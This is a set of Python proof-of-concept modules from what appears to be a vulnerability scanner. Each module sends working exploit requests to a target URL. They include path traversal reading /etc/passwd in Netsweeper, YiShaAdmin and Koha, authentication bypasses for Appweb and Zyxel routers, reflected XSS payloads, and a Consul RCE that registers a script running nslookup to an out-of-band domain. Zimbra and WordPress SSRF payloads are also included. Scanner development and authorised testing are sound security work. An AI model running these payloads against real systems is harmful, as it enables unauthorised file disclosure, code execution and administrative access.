"cve-id": "CVE-2014-9609", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-8715.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''AppWeb Authentication Bypass vulnerability''', 9 | "description": '''The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://github.com/embedthis/appweb/issues/610" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2018-8715", 18 | "cwe-id": "CWE-287" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2018", "appweb", "auth-bypass"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Authorization': 'Digest username=admin'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/yishaadmin-lfi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''yishaadmin path traversal''', 9 | "description": '''An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/", 13 | "https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["lfi", "yishaadmin"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0""" 40 | method = "GET" 41 | data = """""" 42 | headers = {} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9617.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Netsweeper 3.0.6 - Open Redirection''', 10 | "description": '''An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.''', 11 | "severity": "medium", 12 | "references": [ 13 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9617" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2014-9617", 20 | "cwe-id": "CWE-601" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "netsweeper", "redirect"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if "Location" in resp.headers and re.search(r'(?m)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', resp.headers['Location']): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2068.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Magento Server Magmi Plugin - Cross Site Scripting''', 9 | "description": '''Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/35996", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-2068" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "magento", "magmi", "xss", "plugin"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2022/CVE-2022-0218.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting''', 9 | "description": '''WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/", 13 | "https://wordpress.org/plugins/wp-html-mail/", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0218" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2022-0218", 20 | "cwe-id": "CWE-79" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["wordpress", "wp-plugin", "xss", "cve", "cve2022"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/index.php?rest_route=/whm/v3/themesettings' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and '"background":' in resp.text and '"footer":' in resp.text and "application/json" in str(resp.headers): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/hashicorp-consul-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Hashicorp Consul Services Api RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://www.exploit-db.com/exploits/46074" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["hashicorp", "rce", "oast", "intrusive"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/v1/agent/service/register""" 43 | method = "PUT" 44 | data = """{ 45 | "ID": "{{randstr}}", 46 | "Name": "{{randstr}}", 47 | "Address": "127.0.0.1", 48 | "Port": 80, 49 | "check": { 50 | "script": "nslookup {oob_domain}", 51 | "interval": "10s", 52 | "Timeout": "86400s" 53 | } 54 | }""".format(oob_domain=oob_domain) 55 | headers = {} 56 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 57 | 58 | if verify_request(type="dns", flag=flag): 59 | result["success"] = True 60 | result["info"] = info() 61 | result["payload"] = url+path 62 | 63 | except: 64 | result["success"] = False 65 | 66 | return result 67 | 68 | 69 | # Exploit, can be same with poc() 70 | def exp(url): 71 | return poc(url) 72 | 73 | 74 | # Utils 75 | def format_url(url): 76 | url = url.strip() 77 | if not ( url.startswith('http://') or url.startswith('https://') ): 78 | url = 'http://' + url 79 | url = url.rstrip('/') 80 | 81 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/wordpress/wp-multiple-theme-ssrf.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Multiple Themes - Unauthenticated Function Injection''', 9 | "description": '''''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/49327", 13 | "https://wpscan.com/vulnerability/10417" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["wordpress", "rce", "ssrf"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/wp-admin/admin-ajax.php?action=action_name""" 40 | method = "POST" 41 | data = """action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com""" 42 | headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""Example Domain""" in resp0.text and """protocol_version""" in resp0.text) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-4544.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting''', 9 | "description": '''The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-4544" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2014-4544", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-28208.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''RocketChat Unauthenticated Email enumeration''', 9 | "description": '''An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://trovent.io/security-advisory-2010-01" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2020-28208", 18 | "cwe-id": "CWE-203" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2020", "rocketchat"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/api/v1/method.callAnon/sendForgotPasswordEmail""" 39 | method = "POST" 40 | data = """{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}""" 41 | headers = {'Content-Type': 'application/json'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""result\":false""" in resp0.text and """success":true""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/zimbra-preauth-ssrf.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Zimbra Collaboration Suite (ZCS) - SSRF''', 11 | "description": '''A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://www.adminxe.com/2183.html" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["zimbra", "ssrf", "oast"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = """/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{oob_domain}%23.salesforce.com/""".format(oob_domain=oob_domain) 43 | method = "GET" 44 | data = """""" 45 | headers = {'Accept': '*/*'} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4632.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Koha 3.20.1 - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/37388", 13 | "https://www.cvedetails.com/cve/CVE-2015-4632" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "7.5", 18 | "cve-id": "CVE-2015-4632", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-6715.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''CVE-2019-6715''', 9 | "description": '''W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF''', 10 | "severity": "high", 11 | "references": [ 12 | "https://vinhjaxt.github.io/2019/03/cve-2019-6715", 13 | "http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2019-6715", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2019", "wordpress", "wp-plugin", "ssrf"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/wp-content/plugins/w3-total-cache/pub/sns.php""" 40 | method = "PUT" 41 | data = """{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}""" 42 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""TmVzc3VzQ29kZUV4ZWNUZXN0""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2021/CVE-2021-3297.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass''', 9 | "description": '''On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2021-3297", 13 | "https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2021-3297", 19 | "cwe-id": "CWE-287" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2021", "zyxel", "auth-bypass", "router"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/status.htm""" 40 | method = "GET" 41 | data = """""" 42 | headers = {'Cookie': 'language=en; login=1'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (resp0.status_code == 200) and ("""Running Time""" in resp0.text and """Firmware Version""" in resp0.text and """Firmware Build Time""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9608.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.3 - Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9608" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2014-9608", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2017/CVE-2017-17562.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Embedthis GoAhead RCE''', 9 | "description": '''Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.elttam.com/blog/goahead/", 13 | "https://github.com/ivanitlearning/CVE-2017-17562", 14 | "https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2017-17562", 20 | "cwe-id": "CWE-20" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2017", "rce", "goahead", "fuzz"], 27 | } 